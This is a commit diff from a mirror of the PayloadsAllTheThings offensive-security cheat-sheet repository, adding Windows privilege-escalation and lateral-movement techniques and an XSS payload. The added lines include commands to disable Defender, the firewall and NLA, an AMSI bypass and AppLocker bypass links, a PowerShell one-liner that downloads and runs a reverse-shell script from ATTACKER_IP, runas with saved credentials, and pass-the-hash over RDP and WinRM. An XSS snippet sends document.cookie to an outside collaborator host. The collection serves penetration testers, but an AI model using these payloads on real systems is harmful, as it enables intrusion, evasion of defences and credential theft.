mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-05-12 02:16:04 +02:00
AD update CME+DCOM
This commit is contained in:
parent
22340c8fc2
commit
08b59f2856
|
@ -28,6 +28,7 @@
|
|||
* [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide)
|
||||
* [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql)
|
||||
* [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/)
|
||||
* [AutoGraphql + introspection](https://graphql-dashboard.herokuapp.com/)
|
||||
|
||||
## Exploit
|
||||
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -646,4 +646,5 @@ E
|
|||
* [Dechaining macros and evading EDR - Noora Hyvärinen](https://blog.f-secure.com/dechaining-macros-and-evading-edr/)
|
||||
* [Executing macros from docx with remote - RedXORBlueJuly 18, 2018](http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html)
|
||||
* [One thousand and one ways to copy your shellcode to memory (VBA Macros) - X-C3LL - Feb 18, 2021](https://adepts.of0x.cc/alternatives-copy-shellcode/)
|
||||
* [Running macros via ActiveX controls - greyhathacker - September 29, 2016](http://www.greyhathacker.net/?p=948)
|
||||
* [Running macros via ActiveX controls - greyhathacker - September 29, 2016](http://www.greyhathacker.net/?p=948)
|
||||
* [Anti-Analysis Techniques Used in Excel 4.0 Macros - 24 March 2021 - @Jacob_Pimental](https://www.goggleheadedhacker.com/blog/post/23)
|
|
@ -8,6 +8,7 @@
|
|||
* [Network Enumeration](#network-enumeration)
|
||||
* [Antivirus & Detections](#antivirus--detections)
|
||||
* [Windows Defender](#windows-defender)
|
||||
* [Firewall](#firewall)
|
||||
* [AppLocker Enumeration](#applocker-enumeration)
|
||||
* [Powershell](#powershell)
|
||||
* [Default Writeable Folders](#default-writeable-folders)
|
||||
|
@ -97,6 +98,11 @@
|
|||
python3 wes.py --update
|
||||
python3 wes.py systeminfo.txt
|
||||
```
|
||||
- [PrivescCheck - Privilege Escalation Enumeration Script for Windows](https://github.com/itm4n/PrivescCheck)
|
||||
```powershell
|
||||
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
|
||||
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
|
||||
```
|
||||
|
||||
## Windows Version and Configuration
|
||||
|
||||
|
@ -184,6 +190,14 @@ Get-LocalGroupMember Administrators | ft Name, PrincipalSource
|
|||
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
|
||||
```
|
||||
|
||||
Get Domain Controllers
|
||||
|
||||
```powershell
|
||||
nltest /DCLIST:DomainName
|
||||
nltest /DCNAME:DomainName
|
||||
nltest /DSGETDC:DomainName
|
||||
```
|
||||
|
||||
## Network Enumeration
|
||||
|
||||
List all network interfaces, IP, and DNS.
|
||||
|
@ -214,30 +228,6 @@ List all current connections
|
|||
netstat -ano
|
||||
```
|
||||
|
||||
List firewall state and current configuration
|
||||
|
||||
```powershell
|
||||
netsh advfirewall firewall dump
|
||||
|
||||
or
|
||||
|
||||
netsh firewall show state
|
||||
netsh firewall show config
|
||||
```
|
||||
|
||||
List firewall's blocked ports
|
||||
|
||||
```powershell
|
||||
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
|
||||
```
|
||||
|
||||
Disable firewall
|
||||
|
||||
```powershell
|
||||
netsh firewall set opmode disable
|
||||
netsh advfirewall set allprofiles state off
|
||||
```
|
||||
|
||||
List all network shares
|
||||
|
||||
```powershell
|
||||
|
@ -262,7 +252,7 @@ Enumerate antivirus on a box with `WMIC /Node:localhost /Namespace:\\root\Securi
|
|||
# check status of Defender
|
||||
PS C:\> Get-MpComputerStatus
|
||||
|
||||
# disable Real Time Monitoring
|
||||
# disable scanning all downloaded files and attachments, disable AMSI (reactive)
|
||||
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
|
||||
PS C:\> Set-MpPreference -DisableIOAVProtection $true
|
||||
|
||||
|
@ -272,18 +262,59 @@ PS C:\> Set-MpPreference -DisableScriptScanning 1
|
|||
# exclude a folder
|
||||
PS C:\> Add-MpPreference -ExclusionPath "C:\Temp"
|
||||
PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
|
||||
PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
|
||||
|
||||
# remove signatures (if Internet connection is present, they will be downloaded again):
|
||||
PS > "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
|
||||
```
|
||||
|
||||
### Firewall
|
||||
|
||||
List firewall state and current configuration
|
||||
|
||||
```powershell
|
||||
netsh advfirewall firewall dump
|
||||
# or
|
||||
netsh firewall show state
|
||||
netsh firewall show config
|
||||
```
|
||||
|
||||
List firewall's blocked ports
|
||||
|
||||
```powershell
|
||||
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
|
||||
```
|
||||
|
||||
Disable firewall
|
||||
|
||||
```powershell
|
||||
# Disable Firewall on Windows 7 via cmd
|
||||
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||||
|
||||
# Disable Firewall on Windows 7 via Powershell
|
||||
powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value'`
|
||||
|
||||
# Disable Firewall on any windows via cmd
|
||||
netsh firewall set opmode disable
|
||||
netsh Advfirewall set allprofiles state off
|
||||
```
|
||||
|
||||
|
||||
### AppLocker Enumeration
|
||||
|
||||
- With the GPO
|
||||
- HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
|
||||
|
||||
List AppLocker rules
|
||||
|
||||
```powershell
|
||||
PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
|
||||
```
|
||||
* List AppLocker rules
|
||||
```powershell
|
||||
PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
|
||||
```
|
||||
|
||||
* Applocker Bypass
|
||||
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
|
||||
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
|
||||
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
|
||||
|
||||
### Powershell
|
||||
|
||||
|
@ -294,6 +325,22 @@ C:\windows\syswow64\windowspowershell\v1.0\powershell
|
|||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
|
||||
```
|
||||
|
||||
Powershell Constrained Mode
|
||||
|
||||
```powershell
|
||||
# Check if we are in a constrained mode
|
||||
$ExecutionContext.SessionState.LanguageMode
|
||||
|
||||
PS > &{ whoami }
|
||||
powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
|
||||
|
||||
# PowerShDLL - Powershell with no Powershell.exe via DLL’s
|
||||
# https://github.com/p3nt4/PowerShdll
|
||||
ftp> rundll32.exe C:\temp\PowerShdll.dll,main
|
||||
```
|
||||
|
||||
|
||||
|
||||
Example of AMSI Bypass.
|
||||
|
||||
```powershell
|
||||
|
@ -307,7 +354,9 @@ PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetF
|
|||
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
|
||||
C:\Windows\System32\spool\drivers\color
|
||||
C:\Windows\Tasks
|
||||
C:\windows\tracing
|
||||
C:\Windows\tracing
|
||||
C:\Windows\Temp
|
||||
C:\Users\Public
|
||||
```
|
||||
|
||||
## EoP - Looting for passwords
|
||||
|
@ -859,6 +908,7 @@ Then you can use `runas` with the `/savecred` options in order to use the saved
|
|||
The following example is calling a remote binary via an SMB share.
|
||||
```powershell
|
||||
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
|
||||
runas /savecred /user:Administrator "cmd.exe /k whoami"
|
||||
```
|
||||
|
||||
Using `runas` with a provided set of credential.
|
||||
|
|
|
@ -132,8 +132,12 @@ Require:
|
|||
```powershell
|
||||
root@payload$ git clone https://github.com/Hackplayers/evil-winrm
|
||||
root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
|
||||
root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
|
||||
root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
|
||||
root@payload$ ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
|
||||
root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u username -H BD1C6503987F8FF006296118F359FA79
|
||||
root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u username -p password -r domain.local
|
||||
|
||||
*Evil-WinRM* PS > Bypass-4MSI
|
||||
*Evil-WinRM* PS > IEX([Net.Webclient]::new().DownloadString("http://127.0.0.1/PowerView.ps1"))
|
||||
```
|
||||
|
||||
or using a custom ruby code to interact with the WinRM service.
|
||||
|
@ -169,6 +173,11 @@ end
|
|||
```powershell
|
||||
PS> Enable-PSRemoting
|
||||
|
||||
# use credential
|
||||
PS> $pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
|
||||
PS> $cred = New-Object System.Management.Automation.PSCredential ('DOMAIN\Username', $pass)
|
||||
PS> Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }
|
||||
|
||||
# one-to-one interactive session
|
||||
PS> Enter-PSSession -computerName DC01
|
||||
[DC01]: PS>
|
||||
|
@ -239,54 +248,49 @@ PS C:\> PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -
|
|||
|
||||
## RDP Remote Desktop Protocol
|
||||
|
||||
Abuse RDP protocol to execute commands remotely with [SharpRDP](https://github.com/0xthirteen/SharpRDP)
|
||||
|
||||
```powershell
|
||||
PS C:\> SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
|
||||
```
|
||||
|
||||
Or connect remotely with `rdesktop`
|
||||
|
||||
```powershell
|
||||
root@payload$ rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
|
||||
root@payload$ rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10
|
||||
# -g : the screen will take up 70% of your actual screen size
|
||||
# -r disk:share : sharing a local folder during a remote desktop session
|
||||
```
|
||||
|
||||
Note: you may need to enable it with the following command
|
||||
:warning: **NOTE**: You may need to enable RDP and disable NLA and fix CredSSP errors.
|
||||
|
||||
```powershell
|
||||
# Enable RDP
|
||||
PS C:\> reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
|
||||
PS C:\> netsh firewall set service remoteadmin enable
|
||||
PS C:\> netsh firewall set service remotedesktop enable
|
||||
```
|
||||
|
||||
or with psexec(sysinternals)
|
||||
|
||||
```powershell
|
||||
PS C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
|
||||
```
|
||||
|
||||
or with crackmapexec
|
||||
|
||||
```powershell
|
||||
# Alternative
|
||||
C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
|
||||
root@payload$ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
||||
|
||||
# Fix CredSSP errors
|
||||
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||||
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
|
||||
|
||||
# Disable NLA
|
||||
PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName "PC01" -Filter "TerminalName='RDP-tcp'").UserAuthenticationRequired
|
||||
PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName "PC01" -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)
|
||||
```
|
||||
|
||||
or with Metasploit
|
||||
Abuse RDP protocol to execute commands remotely with the following commands;
|
||||
|
||||
```powershell
|
||||
root@payload$ run getgui -u admin -p 1234
|
||||
```
|
||||
* `rdesktop`
|
||||
```powershell
|
||||
root@payload$ rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
|
||||
root@payload$ rdesktop -u username -p password -g 70% -r disk:share=/tmp/myshare 10.10.10.10
|
||||
# -g : the screen will take up 70% of your actual screen size
|
||||
# -r disk:share : sharing a local folder during a remote desktop session
|
||||
```
|
||||
* `freerdp`
|
||||
```powershell
|
||||
root@payload$ xfreerdp /v:10.0.0.1 /u:'Username' /p:'Password123!' +clipboard /cert-ignore /size:1366x768 /smart-sizing
|
||||
root@payload$ xfreerdp /v:10.0.0.1 /u:username # password will be asked
|
||||
|
||||
# pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
|
||||
# pass the hash works for Server 2012 R2 / Win 8.1+
|
||||
root@payload$ xfreerdp /v:10.0.0.1 /u:username /d:domain /pth:88a405e17c0aa5debbc9b5679753939d
|
||||
```
|
||||
* [SharpRDP](https://github.com/0xthirteen/SharpRDP)
|
||||
```powershell
|
||||
PS C:\> SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
|
||||
```
|
||||
|
||||
or with xfreerdp
|
||||
|
||||
```powershell
|
||||
root@payload$ xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
|
||||
root@payload$ xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
|
||||
root@payload$ xfreerd /u:runner /v:10.0.0.1 # password will be asked
|
||||
```
|
||||
|
||||
## Netuse
|
||||
|
||||
|
|
|
@ -90,6 +90,18 @@ fclose($fp);
|
|||
?>
|
||||
```
|
||||
|
||||
### CORS
|
||||
|
||||
```html
|
||||
<script>
|
||||
fetch('https://<SESSION>.burpcollaborator.net', {
|
||||
method: 'POST',
|
||||
mode: 'no-cors',
|
||||
body: document.cookie
|
||||
});
|
||||
</script>
|
||||
```
|
||||
|
||||
### UI redressing
|
||||
|
||||
Leverage the XSS to modify the HTML content of the page in order to display a fake login form.
|
||||
|
|
Loading…
Reference in New Issue